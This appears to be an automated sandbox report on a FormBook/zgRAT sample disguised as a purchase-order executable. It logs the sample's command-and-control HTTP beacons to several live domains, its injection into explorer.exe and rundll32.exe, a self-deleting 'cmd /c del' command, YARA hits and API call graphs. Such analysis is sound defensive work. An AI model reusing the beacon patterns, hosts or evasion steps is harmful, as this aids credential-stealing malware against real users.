                                                                                          Timestamp: May 25, 2022 00:37:47.438154936 CEST | kBytes transferred: 1330 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                          Date: Tue, 24 May 2022 22:37:47 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 260
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.iguaym.com Port 80</address></body></html>


                                                                                          Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49797 | Destination IP: 209.141.38.71 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                                          Timestamp: May 25, 2022 00:37:52.815294027 CEST | kBytes transferred: 1331 | Direction: OUT | Data: GET /j86w/?r0DdqnX=3X6DgWuJKzcNUM7EYaUA4aUsqI76cLlFBEHvGa5sqwhuxxVMpolaJYRqs0EV/jxQHXjU&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.funserve.club
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Timestamp: May 25, 2022 00:37:53.008518934 CEST | kBytes transferred: 1332 | Direction: IN | Data: HTTP/1.1 302 Moved Temporarily
                                                                                          Server: nginx
                                                                                          Date: Tue, 24 May 2022 22:37:52 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 154
                                                                                          Connection: close
                                                                                          Location: http://www.funserve.club?r0DdqnX=3X6DgWuJKzcNUM7EYaUA4aUsqI76cLlFBEHvGa5sqwhuxxVMpolaJYRqs0EV/jxQHXjU&THiL=OBZhFrvhwhfT
                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49798 | Destination IP: 198.54.117.210 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                                          Timestamp: May 25, 2022 00:37:58.239535093 CEST | kBytes transferred: 1333 | Direction: OUT | Data: GET /j86w/?r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.popcornpor.xyz
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:


                                                                                          Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49799 | Destination IP: 104.16.100.51 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                                          Timestamp: May 25, 2022 00:38:03.488841057 CEST | kBytes transferred: 1334 | Direction: OUT | Data: GET /j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfOvAU/+&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.expoj3.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Timestamp: May 25, 2022 00:38:03.523833036 CEST | kBytes transferred: 1334 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
                                                                                          Date: Tue, 24 May 2022 22:38:03 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Tue, 24 May 2022 23:38:03 GMT
                                                                                          Location: https://www.expoj3.com/j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfOvAU/+&THiL=OBZhFrvhwhfT
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 710984f7de619bce-FRA
                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49802 | Destination IP: 15.197.142.173 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                                          Timestamp: May 25, 2022 00:38:08.761045933 CEST | kBytes transferred: 1342 | Direction: OUT | Data: GET /j86w/?r0DdqnX=Cda/DfRT+Myk92AVL8ZtInJusJj7ZXm0kCkpHstkNcvq7ssbimt58lhEnh+W6KwWQFgT&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.danilhodoekhi.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Timestamp: May 25, 2022 00:38:08.813968897 CEST | kBytes transferred: 1348 | Direction: IN | Data: HTTP/1.1 403 Forbidden
                                                                                          Server: awselb/2.0
                                                                                          Date: Tue, 24 May 2022 22:38:08 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 118
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                                          Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49803 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                                          Timestamp: May 25, 2022 00:38:13.906961918 CEST | kBytes transferred: 1349 | Direction: OUT | Data: GET /j86w/?r0DdqnX=YaH7gYIDTqY4cEQIM97hHwWq2XV+liDGv7Lmousy66vButcLOjPrknKPAsD+A1J6Q9LI&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.pieprop.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Timestamp: May 25, 2022 00:38:14.031169891 CEST | kBytes transferred: 1350 | Direction: IN | Data: HTTP/1.1 403 Forbidden
                                                                                          Server: openresty
                                                                                          Date: Tue, 24 May 2022 22:38:13 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 291
                                                                                          ETag: "628d16df-123"
                                                                                          Via: 1.1 google
                                                                                          Connection: close
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                          Target ID:0
                                                                                          Start time:00:35:44
                                                                                          Start date:25/05/2022
                                                                                          Path:C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"
                                                                                          Imagebase:0xeb0000
                                                                                          File size:544768 bytes
                                                                                          MD5 hash:86DD400E33EFA12EA4CBAC3D29000E41
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.465170567.000000000345C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.469891421.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.463274284.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          Target ID:4
                                                                                          Start time:00:35:58
                                                                                          Start date:25/05/2022
                                                                                          Path:C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe
                                                                                          Imagebase:0x9e0000
                                                                                          File size:544768 bytes
                                                                                          MD5 hash:86DD400E33EFA12EA4CBAC3D29000E41
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low

                                                                                          Target ID:5
                                                                                          Start time:00:36:03
                                                                                          Start date:25/05/2022
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                          Imagebase:0x7ff74fc70000
                                                                                          File size:3933184 bytes
                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:high

                                                                                          Target ID:10
                                                                                          Start time:00:36:36
                                                                                          Start date:25/05/2022
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Imagebase:0x2a0000
                                                                                          File size:61952 bytes
                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:high

                                                                                          Target ID:12
                                                                                          Start time:00:36:41
                                                                                          Start date:25/05/2022
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:/c del "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"
                                                                                          Imagebase:0x1100000
                                                                                          File size:232960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Target ID:13
                                                                                          Start time:00:36:42
                                                                                          Start date:25/05/2022
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff77f440000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high


                                                                                            Execution Graph

                                                                                            Execution Coverage:11%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:132
                                                                                            Total number of Limit Nodes:8

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.470370712.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7c60000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15f87f615cc7ed52162c0e0603677389f89a445942f8e7d899d81585104a14bd
                                                                                            • Instruction ID: dbae3d66ce4b9a315ade24dc858f7557735d7ef569855a7113e314f212b4de7e
                                                                                            • Opcode Fuzzy Hash: 15f87f615cc7ed52162c0e0603677389f89a445942f8e7d899d81585104a14bd
                                                                                            • Instruction Fuzzy Hash: 3532BBB4B012059FDB29EBA9C4D4BAEB7F6AF88300F14846DE1459B3A0DB35ED01CB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0308978E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 52971571d70115dbb6f9e4bd9d3faf644f8b32682c1fba477199cad2e5816cf6
                                                                                            • Instruction ID: d12d965ca1fe7b37b0bb8b0614cb5ca28ca314432b63e6a7853dc3bbf5928662
                                                                                            • Opcode Fuzzy Hash: 52971571d70115dbb6f9e4bd9d3faf644f8b32682c1fba477199cad2e5816cf6
                                                                                            • Instruction Fuzzy Hash: 91713370A01B058FDB64EF6AD4447AABBF5BF88214F04892ED48AD7A40DB35E845CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 60 3085364-3085366 61 3085368-308536a 60->61 62 308536d-308536e 60->62 63 308536c 61->63 64 3085371-3085374 61->64 65 3085370 62->65 66 3085375-3085431 CreateActCtxA 62->66 63->62 64->66 65->64 68 308543a-3085494 66->68 69 3085433-3085439 66->69 76 30854a3-30854a7 68->76 77 3085496-3085499 68->77 69->68 78 30854b8 76->78 79 30854a9-30854b5 76->79 77->76 81 30854b9 78->81 79->78 81->81
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 03085421
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: e78ad919a2c3680daea031c37cd247d91f5c1c63237a74178e9f8316ccfd7e56
                                                                                            • Instruction ID: c683b6ee5768543009d43fa429e4709547eeaa9e9c16445575b7403cf0840de0
                                                                                            • Opcode Fuzzy Hash: e78ad919a2c3680daea031c37cd247d91f5c1c63237a74178e9f8316ccfd7e56
                                                                                            • Instruction Fuzzy Hash: A04135B1C00218CFDB24DFAAC844BDEBBF5BF49309F648469D448AB251D775594ACF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 82 3083e2c-3085431 CreateActCtxA 87 308543a-3085494 82->87 88 3085433-3085439 82->88 95 30854a3-30854a7 87->95 96 3085496-3085499 87->96 88->87 97 30854b8 95->97 98 30854a9-30854b5 95->98 96->95 100 30854b9 97->100 98->97 100->100
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 03085421
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 9a46262d7d4591c9b704e73128e2464bc9a9ee383f23167c2da602eec5e288d8
                                                                                            • Instruction ID: 2858fe5d62e79f767c1000948d6e09b8934448eeb3b95a5fba419e26e340bb5f
                                                                                            • Opcode Fuzzy Hash: 9a46262d7d4591c9b704e73128e2464bc9a9ee383f23167c2da602eec5e288d8
                                                                                            • Instruction Fuzzy Hash: C34122B0C00618CFCB24DFAAC884BCEBBF5BF49308F60846AD448AB251D7756949CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 101 308a26c-308baec DuplicateHandle 104 308baee-308baf4 101->104 105 308baf5-308bb12 101->105 104->105
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0308BA1E,?,?,?,?,?), ref: 0308BADF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 49a247f2a44a8a4bd2896d2abf307d78c9ba7d1f4d6dc071bec3ba4f3456533b
                                                                                            • Instruction ID: 8e7b1da029a17f0ccb375ca9e8a45c8b6518824ef14be15abe0ee60f8025ad80
                                                                                            • Opcode Fuzzy Hash: 49a247f2a44a8a4bd2896d2abf307d78c9ba7d1f4d6dc071bec3ba4f3456533b
                                                                                            • Instruction Fuzzy Hash: 9021E3B59012499FDB10CF9AD884AEEBBF8FB48320F14842AE954A3350D375A954CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 108 308ba51-308ba56 109 308ba58-308ba5c 108->109 110 308ba5d-308baec DuplicateHandle 108->110 109->110 111 308baee-308baf4 110->111 112 308baf5-308bb12 110->112 111->112
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0308BA1E,?,?,?,?,?), ref: 0308BADF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 44b083589c4e500a21ae98454d02289a404c89e2094ab1543386b89a2774e64c
                                                                                            • Instruction ID: 75c9000ebd7623b81a33bf0670168111d75c6e8e98764c5e8aa0a0065959436e
                                                                                            • Opcode Fuzzy Hash: 44b083589c4e500a21ae98454d02289a404c89e2094ab1543386b89a2774e64c
                                                                                            • Instruction Fuzzy Hash: 5321E3B59012099FDB10CFAAD884AEEBBF8FF48320F14841AE954A3310D375A944CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 115 30899a8-30899aa 116 30899ac-30899af 115->116 117 30899b1-30899f0 115->117 116->117 118 30899f8-3089a27 LoadLibraryExW 117->118 119 30899f2-30899f5 117->119 120 3089a29-3089a2f 118->120 121 3089a30-3089a4d 118->121 119->118 120->121
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,03089809,00000800,00000000,00000000), ref: 03089A1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 9863f2bf0b5c041d3ae93daf8dec1b98592352942a27b61d0081d26649ced350
                                                                                            • Instruction ID: 6fcc08513bf0677f92d82c038836c53cf4c9409abbd0f33504de825f0aa94bab
                                                                                            • Opcode Fuzzy Hash: 9863f2bf0b5c041d3ae93daf8dec1b98592352942a27b61d0081d26649ced350
                                                                                            • Instruction Fuzzy Hash: 151117B6D002099FCB10DF9AD884BEEFBF8AB89320F14852AD555B7310C375A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 124 3088868-30899f0 127 30899f8-3089a27 LoadLibraryExW 124->127 128 30899f2-30899f5 124->128 129 3089a29-3089a2f 127->129 130 3089a30-3089a4d 127->130 128->127 129->130
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,03089809,00000800,00000000,00000000), ref: 03089A1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 964c553d7e93fe4545758ede62dafe8c68760a74d1c18355676c510bb5314b15
                                                                                            • Instruction ID: 0a1f17cff7c9d7b5a7554fc9e174d5f243864f6e6abbc40997d1f1579d512f16
                                                                                            • Opcode Fuzzy Hash: 964c553d7e93fe4545758ede62dafe8c68760a74d1c18355676c510bb5314b15
                                                                                            • Instruction Fuzzy Hash: CE1106B59002098FCB10DF9AD884AEEFBF4AB48310F14842AD455B7200C375A945CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 133 3089728-3089768 136 308976a-308976d 133->136 137 3089770-308979b GetModuleHandleW 133->137 136->137 138 308979d-30897a3 137->138 139 30897a4-30897b8 137->139 138->139
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0308978E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 35a09a5c1c2a87ce9c5ca71fcabb8703ad817da323f259f8b69317c2017916c8
                                                                                            • Instruction ID: 87fa527039f79ed653b67e25c692d4933d56980d95537c0e5f9513fa12fe8c25
                                                                                            • Opcode Fuzzy Hash: 35a09a5c1c2a87ce9c5ca71fcabb8703ad817da323f259f8b69317c2017916c8
                                                                                            • Instruction Fuzzy Hash: 9E110FB5C002098FCB10DF9AC444AEFFBF8AF88224F14842AD859A7200C379A545CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 141 7c68740-7c687aa PostMessageW 142 7c687b3-7c687c7 141->142 143 7c687ac-7c687b2 141->143 143->142
                                                                                            APIs
